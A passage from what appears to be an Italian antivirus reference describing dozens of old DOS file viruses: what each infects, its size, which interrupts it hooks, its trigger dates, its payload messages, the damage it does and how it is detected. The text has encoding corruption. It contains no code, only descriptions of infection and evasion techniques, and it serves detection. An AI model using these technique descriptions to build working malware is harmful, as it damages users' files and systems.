il virus alla fine del file. Se il file header Φ : "SCAN","STOP", "SHIELD", "CLEAN", "CV", "DEBUG", o "TD" il virus non infetta questi file ma ripristina l'int 21h sul valore originale cos∞ che questi file non sono in grado di individuare la presenza del virus. 3. Questo virus Φ attivo solo a luglio, dal giorno 4 in poi. Scrive informazioni parassite sul disco in uso dal settore 1 al 256. Le informazioni parassite includono il seguente messaggio: "Hello, world! I am the Bloody Warrior. Nice to meet you. What about this virus ? Funny ? There is no hope for you. This virus was released in Milan 1993." Note: C'Φ la possibilitα di identificarlo usando i comandi DOS. [17690] Nome del Virus: 17.690. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 17.690 Byte. Procedura eseguita: 1) Esiste il 10% di possibilitα che il virus infetti un file. Il metodo di infezione Φ: il virus cerca un file con estensione *.EXE sul drive A. Rinomina questo file e crea un nuovo file con estensione *.COM con lo stesso nome del file originale di estensione *.EXE. Questo nuovo file con estensione *.COM Φ il virus. 2) Quando il virus non infetta i file, esegue il programma rinominato. L'utente non nota nulla di anomalo. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 17.690 Byte. [Fish 1100] Nome del Virus: Fish-1100. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.100 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.100 Byte. [Fish 2420] Nome del Virus: Fish-2420. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 2.420 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica residente in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 2.420 Byte. [Small 178] Nome del Virus: Small-178. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 178 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 178 Byte. [Shiny-Happy] Nome del Virus: Shiny-Happy. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 921 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 921 Byte. [Sucker] Nome del Virus: Sucker. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 572 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.EXE, il virus lo infetta. Danni: Nessuno. Note: 1) Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. 2) Questo virus pu≥ essere pulito con Soft-Mice. Il virus darα un errore pulendo SUCKER.CO. Metodo di rilevazione: I file infetti aumentano di 572 Byte. [Data-Rape-2.0] Nome del Virus: Data-Rape-2.0. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.875-1.890 Byte Vettore PC agganciato: INT 21h Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.875-1.890 Byte. [Flagyll] Nome del Virus: Flagyll. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.EXE, il virus lo infetta. Danni: Sovrascrive il file originale con il codice virale, questo corrompe il file. Note: Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. [X-3B] Nome del Virus: X-3B. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.060 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.060 Byte. [Math-Test] Nome del Virus: Math-Test. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.136 Byte. Vettore PC agganciato: INT 21h Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 1.136 Byte. [Not-586] Nome del Virus: Not-586. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 586 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 586 Byte. [Xoana] Nome del Virus: Xoana. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.670 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.EXE, il virus lo infetta. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 1.670 Byte. [Pit-1228] Nome del Virus: Pit-1228. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.228 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM o *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.228 Byte. [Finnish-357] Nome del Virus: Finnish-357. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 709 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e controlla che il COMMAND.COM che ha avviato il sitema sia infetto. Se "NO", il virus lo infetta e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire fosse un file non infetto con estensione COM file, il virus lo infetta. Metodo di rilevazione: I file infetti aumentano di 709 Byte. [TU-482] Nome del Virus: Tu-482. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 482 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguireΦun file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Note: 1) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. 2) Quando il virus viene eseguito, salta alla fine del programma, quindi ritorna all'inizio rendendo difficile la sua identificazione. Metodo di rilevazione: I file infetti aumentano di 482 Byte. [Uruk-Hai] Nome del Virus: Uruk-Hai. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 394 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 394 Byte. [V-388] Nome del Virus: V-388. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 394 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM che termina con l'INT 21(AH=4Ch), il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 394 Byte. [Wizard 3.0] Nome del Virus: Wizard-3.0. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 268 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione COM file, il virus lo infetta. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perche l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 268 Byte. [Semtex] Nome del Virus: Semtex. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.000 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e l'INT 8h, poi torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Note: 1) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. 2) All'inizio del file infetto, pu≥ essere trovato quanto segue: MOV BP,XXXX JMP BP Metodo di rilevazione: I file infetti aumentano di 1.000 Byte. [1720] Nome del Virus: 1720. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.723 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.723 Byte. [Number 6] Nome del Virus: Number6. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 631 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 631 Byte. [Timemark] Nome del Virus: Timemark. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 1.060-1.080 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φun file non infetto con estensione *.EXE, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.060-1.080 Byte. [Sergant] Nome del Virus: Sergant. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 108 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φun file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 108 Byte. [Penza] Nome del Virus: Penza. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 700 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per non lasciare tracce quando scrive. Se il programma da eseguire Φ un file non infetto con estensione *.COM, il virus lo infetta. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 700 Byte. [Nines] Nome del Virus: Nines. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 706 o 776 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica in memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file non infetto con estensione COM file, il virus lo infetta. Danni: Nessuno. Note: Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 706 o 776 Byte. [Seacat] Nome del Virus: Seacat. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.600 Byte. Procedura eseguita: Il virus cerca i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 1.600 Byte. [Wake] Nome del Virus: Wake. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Procedura eseguita: Il virus cerca tutti i file non infetti con estensione *.EXE nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). Danni: Sovrascrive il file originale con il codice virale, questo lo corrompe. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. [T-1000-B] Nome del Virus: T-1000-B. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Procedura eseguita: Il virus cerca tutti i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). Danni: Sovrascrive il file originale con il codice virale, questo lo corrompe. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. [Soupy] Nome del Virus: Soupy. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 1.072 Byte. Procedura eseguita: Il virus cerca i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato Metodo di rilevazione: I file infetti aumentano di 1.072 Byte. [Small-Exe] Nome del Virus: Small-Exe. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 349 Byte. Procedura eseguita: Il virus cerca i file non infetti con estensione *.EXE nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). Dopo l'infezione il virus blocca il sistema. Danni: Il virus blocca il sistema ogni volta che infetta un file. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 349 Byte. [Toys] Nome del Virus: Toys. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 773 Byte. Procedura eseguita: Il virus cerca i file non infetti con estensione *.COM ed con estensione *.EXE nella cartella in uso e li infetta. (Infetta due file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato Metodo di rilevazione: I file infetti aumentano di 773 Byte. [Leper] Nome del Virus: Leper. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Procedura eseguita: Il virus cerca i file non infetti con estensione *.COM ed con estensione *.EXE nella cartella in uso e li infetta. (Infetta quatro file alla volta). Danni: Sovrascrive il file originale con il codice virale, questo corrompe i file. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. [Arcv-7] Nome del Virus: Arcv-7. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 541 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.EXE nella cartella in uso, quindi lo infetta. (Infetta un solo file alla volta). Danni: Nessuno. Note: 1) Dato che il programma del virus non Φ stato scritto correttamente, il sistama si blocca quando viene eseguito un programma infetto. 2) Non residente in memoria. 3) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato Metodo di rilevazione: I file infetti aumentano di 541 Byte. [Arcv-6] Nome del Virus: Arcv-6. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 335 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.COM nella cartella in uso, quindi lo infetta. (Infetta un solo file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 335 Byte. [Arcv-5] Nome del Virus: Arcv-5. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 475 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.COM nella cartella in uso, quindi lo infetta. (Infetta un solo file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 475 Byte. [Exper-416] Nome del Virus: Exper-416. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 416 Byte. Procedura eseguita: Il virus cerca tutti i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato Metodo di rilevazione: I file infetti aumentano di 416 Byte. [Ash-B] Nome del Virus: Ash-B. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 280 Byte. Procedura eseguita: Il virus cerca tutti i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΘ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 280 Byte. [Scribble] Nome del Virus: Scribble. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Procedura eseguita: Il virus cerca tutti i file non infetti con estensione *.COM ed *.EXE nella cartella in uso, quindi li infetta. Danni: Sovrascrive il file originale con il codice virale, questo corrompe i file. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. [Simple 1992] Nome del Virus: Simple-1992. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 424 Byte. Procedura eseguita: Il virus cerca tutti i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. (Il virus infetta anche il COMMAND.COM.) Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato Metodo di rilevazione: I file infetti aumentano di 424 Byte. [Schrunch] Nome del Virus: Schrunch. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 420 Byte. Procedura eseguita: Il virus mostra il seguente messaggio : "S C H R U N CH E M U P T I M E." Il virus cerca tutti i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: 1) I file infetti aumentano di 420 Byte. 2) Il virus mostra il messaggio sopra riportato. [CV4] Nome del Virus: Cv4. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 321 Byte. Procedura eseguita: Il virus mostra il seguente messaggio : "This file infected with COMVIRUS 1.0." Il virus cerca un file non infetto con estensione *.COM nella cartella in uso e lo infetta. (Infetta un solo un file alla volta). Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: 1) I file infetti aumentano di 321 Byte. 2) Il virus mostra il messaggio sopra riportato. [Arcv-3A] Nome del Virus: Arcv-3a. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 657 Byte. Procedura eseguita: 1) Il virus cerca tutti i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. 2) Controlla che il mese sia febbraio. Se "SI", il virus mostra il seguente messaggio: "I've just Found a Virus.. Oops.. Sorry I'm the virus...Well let me introduce myself.. I am ARCV-3 Virus, by Apache Warrior... Long Live The ARCV and What s an Hard ECU?.. Vote Yes to the Best Vote ARCV..." Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 657 Byte. [Anti_Daf] Nome del Virus: Anti_Daf. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 561 Byte. Procedura eseguita: 1) Cerca i file non infetti con estensione *.COM nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). 2) Controlla che sia novembre e che il giorno sia luned∞. Se ci sono queste condizioni, il virus mostra il seguente messaggio e distrugge tutti i dati sull'hard disk: "The Anti_Daf virus.. DAF-TRUCKSE indhoven.. Hugo vd Goeslaan 1..postbus 90063..6500 PREindhoven, The Netherlands. .. DAF sucks..... (c) 1992 Dark Helmet & The Virus Research Centre" Danni: Il virus alcune volte distrugge tutti i dati sull'hard disk. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 561 Byte. [Manola] Nome del Virus: Manola. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 831 Byte. Procedura eseguita: Il virus controlla che il giorno corrente sia 7. Se "SI", mostra il seguente messaggio e riavvia il sistema: "The Atomic Dustbin 2B - I'm Here To Stay". Se ci sono le tutte condizioni, il virus cerca un file pulito con estensione *.COM nella cartella in uso, quindi lo infetta (infetta solo un file alla volta). Danni: Il virus alcune volte riavvia il sistema. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 831 Byte. [Seneca-A] Nome del Virus: Seneca-A Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Procedura eseguita: 1) Cerca tutti i file non infetti con estensione *.EXE nella cartella in uso, quindi li infetta. 2) Controlla che la data di sistema sia il 25 novembre. Se "SI", il virus mostra il seguente messaggio e distrugge tutti i dati sull'hard disk: "Its Seneca's B_DAY let's party !!!" Danni: Il virus alcune volte distrugge tutti i dati sull'hard disk. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. [Seneca-B] Nome del Virus: SENECA-B. Tipo di Virus: Virus da file. Procedura eseguita: 1) Cerca tutti i file non infetti (*.*) nella cartella in uso e li infetta. 2) Controlla che la data di sistema sia il 25 novembre. Se "SI", il virus mostra il seguente messaggio e distrugge tutti i dati sull'hard disk: "Its Seneca's B_DAY let's party !!!" Danni: Il virus alcune volte distrugge tutti i dati sull'hard disk. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. [Mog] Nome del Virus: Mog. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 328 Byte. Procedura eseguita: 1) Il virus cerca tutti i file non infetti con estensione *.COM nella directory in uso, quiundi li infetta. Il virus poi mostra il seguente messaggio: " Maccabi Yafo !!!!!" 2) Controlla che la data di sistema sia il 25 novembre. Se "SI", il virus blocca il sistema. Danni: Il virus alcune volte blocca il sistema. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 328 Byte. [LZ2] Nome del Virus: Lz2. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 3.000-8.000 Byte. Procedura eseguita: Il virus cerca un file non infetto con estensione *.EXE nella cartella in uso, quindi lo infetta. (Infetta un solo file alla volta). Metodo di infezione: Crea un nuovo file con estensione *.COM con lo stesso nome del file con estensione *.EXE. Questo nuovo file con estensione *.COM Φ il virus. La sua lunghezza Φ compresa tra 3.000-8.000 Byte. Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore quando scrive perchΦ l'INT 24h non Φ stato agganciato. 3) La procedura all'inizio del virus Φ criptata in modalitα LZEXE. PCSCAN non individua questo virus. [Silver-3D] Nome del Virus: Silver-3d. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Procedura eseguita: Il virus cerca i file non infetti con estensione *.COM ed *.EXE nella cartella in uso, quindi li infetta (infetta quattro file alla volta). Il virus mostra il seguente messaggio : "Program too big to fit in memoria." Danni: 1) Sovrascrive il file originale con il codice virale, ci≥ corrompe i file. 2) Se il virus non trova un file non infetto, appare il messaggio "PLO VIRUS RESEARCH TEAM" con caratteri grandi. Il virus quindi blocca il sistema. Metodo di rilevazione: 1) La lunghezza dei file infetti con estensione *.COM Φ di 8.101 Byte. 2) Eseguendo i file infetti appare il seguente messaggio: "Program too big to fit in memoria" o "PLO VIRUS RESEARCH TEAM." [Silly-Willy] Nome del Virus: Silly-Willy. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM ed *.EXE). Procedura eseguita: 1) Quando si esegue un file infetto con estensione *.COM, il virus infetta i file solo quando la data di sistema Φ compresa tra il 1988 ed il 1992. Quando infetta i file, il virus cerca un file non infetto con estensione *.COM ed i file con estensione *.EXE nella cartella in uso, quindi li infetta. Il virus infetta solo un file con estensione *.COM ed *.EXE alla volta. 2) Eseguendo un file infetto con estensione *.EXE non si infettano altri file. A questo punto compare una faccia sorridente sullo schermo. Quando viene premuto un tasto, compare il seguente messaggio: "Hello ! I'm Silly-Willy Now, I'm formatting your HARDDISK.........." Non formatta realmente l'hard disk. Se c'Φ un floppy nel drive A, tutti i dati sul dischetto vengono distrutti ed il virus blocca il sistema. Danni: Il virus alcune volte distrugge tutti i dati sul dischetto nel drive A e blocca il sistema. 